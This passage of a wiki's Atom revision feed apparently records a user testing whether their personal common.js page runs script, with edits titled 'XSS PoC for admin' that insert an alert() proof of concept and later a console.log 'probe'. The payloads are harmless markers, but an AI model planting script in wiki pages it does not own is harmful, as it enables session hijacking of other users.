&lt;tr&gt;&lt;td class=&#039;diff-marker&#039;&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;alert&lt;/del&gt;(&amp;quot;&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;XSS from WikiTest789 user JS page&lt;/del&gt;&amp;quot;)&lt;/div&gt;&lt;/td&gt;&lt;td class=&#039;diff-marker&#039;&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;// Cross-vhost test marker i542\nconsole.log&lt;/ins&gt;(&amp;quot;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;probe&lt;/ins&gt;&amp;quot;)&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;;&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;</summary>
		<author><name>WikiTest789</name></author>
	</entry>
	<entry>
		<id>https://wiki.mydefichain.com/index.php?title=User:WikiTest789/common.js&amp;diff=3578&amp;oldid=prev</id>
		<title>WikiTest789: XSS PoC for admin</title>
		<link rel="alternate" type="text/html" href="https://wiki.mydefichain.com/index.php?title=User:WikiTest789/common.js&amp;diff=3578&amp;oldid=prev"/>
		<updated>2026-07-08T18:04:59Z</updated>

		<summary type="html">&lt;p&gt;XSS PoC for admin&lt;/p&gt;
&lt;table class=&quot;diff diff-contentalign-left diff-editfont-monospace&quot; data-mw=&quot;interface&quot;&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;en&quot;&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;← Older revision&lt;/td&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;Revision as of 18:04, 8 July 2026&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l1&quot; &gt;Line 1:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Line 1:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&#039;diff-marker&#039;&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;// &lt;/del&gt;JS &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;test&lt;/del&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class=&#039;diff-marker&#039;&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;alert(&amp;quot;XSS from WikiTest789 user &lt;/ins&gt;JS &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;page&amp;quot;)&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;</summary>
		<author><name>WikiTest789</name></author>
	</entry>
	<entry>
		<id>https://wiki.mydefichain.com/index.php?title=User:WikiTest789/common.js&amp;diff=3567&amp;oldid=prev</id>
		<title>WikiTest789: test</title>
		<link rel="alternate" type="text/html" href="https://wiki.mydefichain.com/index.php?title=User:WikiTest789/common.js&amp;diff=3567&amp;oldid=prev"/>
		<updated>2026-07-08T16:04:42Z</updated>

		<summary type="html">&lt;p&gt;test&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;// JS test&lt;/div&gt;</summary>
		<author><name>WikiTest789</name></author>
	</entry>
</feed>